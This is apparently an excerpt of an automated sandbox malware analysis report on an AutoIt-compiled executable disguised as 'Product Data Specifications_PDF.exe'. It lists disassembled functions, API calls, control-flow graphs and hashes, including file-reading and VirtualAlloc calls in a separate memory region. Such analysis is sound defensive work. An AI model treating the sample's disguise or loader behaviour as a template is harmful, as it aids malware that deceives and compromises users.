                              • _fseek.LIBCMT ref: 004529BF
                              • _malloc.LIBCMT ref: 004529CA
                              • _malloc.LIBCMT ref: 004529D6
                              • __fread_nolock.LIBCMT ref: 004529E7
                              • _free.LIBCMT ref: 00452A17
                              • _free.LIBCMT ref: 00452A20
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                              • String ID:
                              • API String ID: 1255752989-0
                              • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                              • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                              • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                              • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                              Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                              • RegisterClassExW.USER32(00000030), ref: 004104ED
                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                              • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                              • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                              • ImageList_ReplaceIcon.COMCTL32(00938D90,000000FF,00000000), ref: 00410552
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                              • API String ID: 2914291525-1005189915
                              • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                              • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                              • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                              • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                              Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                              • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                              • LoadIconW.USER32(?,00000063), ref: 004103C0
                              • LoadIconW.USER32(?,000000A4), ref: 004103D3
                              • LoadIconW.USER32(?,000000A2), ref: 004103E6
                              • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                              • RegisterClassExW.USER32(?), ref: 0041045D
                                • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00938D90,000000FF,00000000), ref: 00410552
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                              • String ID: #$0$AutoIt v3
                              • API String ID: 423443420-4155596026
                              • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                              • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                              • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                              • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                              Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _malloc
                              • String ID: Default
                              • API String ID: 1579825452-753088835
                              • Opcode ID: ad9c003b1f2fa77121fbfcba884144bd1a02cdd9abf6dd606c80e641f461d2b6
                              • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                              • Opcode Fuzzy Hash: ad9c003b1f2fa77121fbfcba884144bd1a02cdd9abf6dd606c80e641f461d2b6
                              • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                              Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2036 40f5c0-40f5cf call 422240 2039 40f5d0-40f5e8 2036->2039 2039->2039 2040 40f5ea-40f613 call 413650 call 410e60 2039->2040 2045 40f614-40f633 call 414d04 2040->2045 2048 40f691 2045->2048 2049 40f635-40f63c 2045->2049 2050 40f696-40f69c 2048->2050 2051 40f660-40f674 call 4150d1 2049->2051 2052 40f63e 2049->2052 2055 40f679-40f67c 2051->2055 2053 40f640 2052->2053 2056 40f642-40f650 2053->2056 2055->2045 2057 40f652-40f655 2056->2057 2058 40f67e-40f68c 2056->2058 2061 40f65b-40f65e 2057->2061 2062 425d1e-425d3e call 4150d1 call 414d04 2057->2062 2059 40f68e-40f68f 2058->2059 2060 40f69f-40f6ad 2058->2060 2059->2057 2064 40f6b4-40f6c2 2060->2064 2065 40f6af-40f6b2 2060->2065 2061->2051 2061->2053 2072 425d43-425d5f call 414d30 2062->2072 2067 425d16 2064->2067 2068 40f6c8-40f6d6 2064->2068 2065->2057 2067->2062 2070 425d05-425d0b 2068->2070 2071 40f6dc-40f6df 2068->2071 2070->2056 2073 425d11 2070->2073 2071->2057 2072->2050 2073->2067
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __fread_nolock_fseek_memmove_strcat
                              • String ID: AU3!$EA06
                              • API String ID: 1268643489-2658333250
                              • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                              • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                              • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                              • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                              Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2076 401100-401111 2077 401113-401119 2076->2077 2078 401179-401180 2076->2078 2080 401144-40114a 2077->2080 2081 40111b-40111e 2077->2081 2078->2077 2079 401182 2078->2079 2084 40112c-401141 DefWindowProcW 2079->2084 2082 401184-40118e call 401250 2080->2082 2083 40114c-40114f 2080->2083 2081->2080 2085 401120-401126 2081->2085 2093 401193-40119a 2082->2093 2086 401151-401157 2083->2086 2087 40119d 2083->2087 2085->2084 2089 42b038-42b03f 2085->2089 2090 401219-40121f 2086->2090 2091 40115d 2086->2091 2094 4011a3-4011a9 2087->2094 2095 42afb4-42afc5 call 40f190 2087->2095 2089->2084 2092 42b045-42b059 call 401000 call 40e0c0 2089->2092 2090->2085 2098 401225-42b06d call 468b0e 2090->2098 2096 401163-401166 2091->2096 2097 42b01d-42b024 2091->2097 2092->2084 2094->2085 2101 4011af 2094->2101 2095->2093 2103 42afe9-42b018 call 40f190 call 401a50 2096->2103 2104 40116c-401172 2096->2104 2097->2084 2102 42b02a-42b033 call 4370f4 2097->2102 2098->2093 2101->2085 2108 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2101->2108 2109 4011db-401202 SetTimer RegisterWindowMessageW 2101->2109 2102->2084 2103->2084 2104->2085 2113 401174-42afde call 45fd57 2104->2113 2109->2093 2111 401204-401216 CreatePopupMenu 2109->2111 2113->2084 2127 42afe4 2113->2127 2127->2093
                              APIs
                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                              • KillTimer.USER32(?,00000001,?), ref: 004011B9
                              • PostQuitMessage.USER32(00000000), ref: 004011CB
                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                              • CreatePopupMenu.USER32 ref: 00401204
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                              • String ID: TaskbarCreated
                              • API String ID: 129472671-2362178303
                              • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                              • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                              • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                              • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                              Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2128 4115d7-4115df 2129 4115ee-4115f9 call 4135bb 2128->2129 2132 4115e1-4115ec call 411988 2129->2132 2133 4115fb-4115fc 2129->2133 2132->2129 2136 4115fd-41160e 2132->2136 2137 411610-41163b call 417fc0 call 41130a 2136->2137 2138 41163c-411656 call 4180af call 418105 2136->2138 2137->2138
                              APIs
                              • _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                              • std::exception::exception.LIBCMT ref: 00411626
                              • std::exception::exception.LIBCMT ref: 00411640
                              • __CxxThrowException@8.LIBCMT ref: 00411651
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                              • String ID: ,*H$4*H$@fI
                              • API String ID: 615853336-1459471987
                              • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                              • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                              • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                              • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                              Function 04004EB0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2147 4004eb0-4004f5e call 4002890 2150 4004f65-4004f8b call 4005dc0 CreateFileW 2147->2150 2153 4004f92-4004fa2 2150->2153 2154 4004f8d 2150->2154 2159 4004fa4 2153->2159 2160 4004fa9-4004fc3 VirtualAlloc 2153->2160 2155 40050dd-40050e1 2154->2155 2157 4005123-4005126 2155->2157 2158 40050e3-40050e7 2155->2158 2161 4005129-4005130 2157->2161 2162 40050f3-40050f7 2158->2162 2163 40050e9-40050ec 2158->2163 2159->2155 2166 4004fc5 2160->2166 2167 4004fca-4004fe1 ReadFile 2160->2167 2168 4005132-400513d 2161->2168 2169 4005185-400519a 2161->2169 2164 4005107-400510b 2162->2164 2165 40050f9-4005103 2162->2165 2163->2162 2172 400511b 2164->2172 2173 400510d-4005117 2164->2173 2165->2164 2166->2155 2174 4004fe3 2167->2174 2175 4004fe8-4005028 VirtualAlloc 2167->2175 2176 4005141-400514d 2168->2176 2177 400513f 2168->2177 2170 40051aa-40051b2 2169->2170 2171 400519c-40051a7 VirtualFree 2169->2171 2171->2170 2172->2157 2173->2172 2174->2155 2178 400502a 2175->2178 2179 400502f-400504a call 4006010 2175->2179 2180 4005161-400516d 2176->2180 2181 400514f-400515f 2176->2181 2177->2169 2178->2155 2187 4005055-400505f 2179->2187 2184 400517a-4005180 2180->2184 2185 400516f-4005178 2180->2185 2183 4005183 2181->2183 2183->2161 2184->2183 2185->2183 2188 4005061-4005090 call 4006010 2187->2188 2189 4005092-40050a6 call 4005e20 2187->2189 2188->2187 2195 40050a8 2189->2195 2196 40050aa-40050ae 2189->2196 2195->2155 2197 40050b0-40050b4 CloseHandle 2196->2197 2198 40050ba-40050be 2196->2198 2197->2198 2199 40050c0-40050cb VirtualFree 2198->2199 2200 40050ce-40050d7 2198->2200 2199->2200 2200->2150 2200->2155
                              APIs
                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04004F81
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 040051A7
                              Memory Dump Source
                              • Source File: 00000006.00000002.1383212336.0000000004002000.00000040.00000020.00020000.00000000.sdmp, Offset: 04002000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_4002000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                              • Instruction ID: 1b2642848d7560664e3b9f9078f4f021fc65fe28453b99d761064bfbb9b58ef2
                              • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                              • Instruction Fuzzy Hash: 90A1F874E00209EBEB14CFA4C894BEEBBB5BF48304F208559E515BB2C0D775AA81DF95
                              Function 004102B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2201 4102b0-4102c5 SHGetMalloc 2202 4102cb-4102da SHGetDesktopFolder 2201->2202 2203 425dfd-425e0e call 433244 2201->2203 2204 4102e0-41031a call 412fba 2202->2204 2205 41036b-410379 2202->2205 2213 410360-410368 2204->2213 2214 41031c-410331 SHGetPathFromIDListW 2204->2214 2205->2203 2211 41037f-410384 2205->2211 2213->2205 2215 410351-41035d 2214->2215 2216 410333-41034a call 412fba 2214->2216 2215->2213 2216->2215
                              APIs
                              • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                              • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                              • _wcsncpy.LIBCMT ref: 004102ED
                              • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                              • _wcsncpy.LIBCMT ref: 00410340
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                              • String ID: C:\Users\user\Desktop\Product Data Specifications_PDF.exe
                              • API String ID: 3170942423-1668980472
                              • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                              • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                              • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                              • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                              Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2219 401250-40125c 2220 401262-401293 call 412f40 call 401b80 2219->2220 2221 4012e8-4012ed 2219->2221 2226 4012d1-4012e2 KillTimer SetTimer 2220->2226 2227 401295-4012b5 2220->2227 2226->2221 2228 4012bb-4012bf 2227->2228 2229 4272ec-4272f2 2227->2229 2232 4012c5-4012cb 2228->2232 2233 42733f-427346 2228->2233 2230 4272f4-427315 Shell_NotifyIconW 2229->2230 2231 42731a-42733a Shell_NotifyIconW 2229->2231 2230->2226 2231->2226 2232->2226 2234 427393-4273b4 Shell_NotifyIconW 2232->2234 2235 427348-427369 Shell_NotifyIconW 2233->2235 2236 42736e-42738e Shell_NotifyIconW 2233->2236 2234->2226 2235->2226 2236->2226
                              APIs
                                • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                              • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                              • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                              • String ID:
                              • API String ID: 3300667738-0
                              • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                              • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                              • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                              • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                              Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                              • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: QueryValue$CloseOpen
                              • String ID: Include$Software\AutoIt v3\AutoIt
                              • API String ID: 1586453840-614718249
                              • Opcode ID: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                              • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                              • Opcode Fuzzy Hash: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                              • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                              Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                              Download Yara Rule
                              APIs
                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
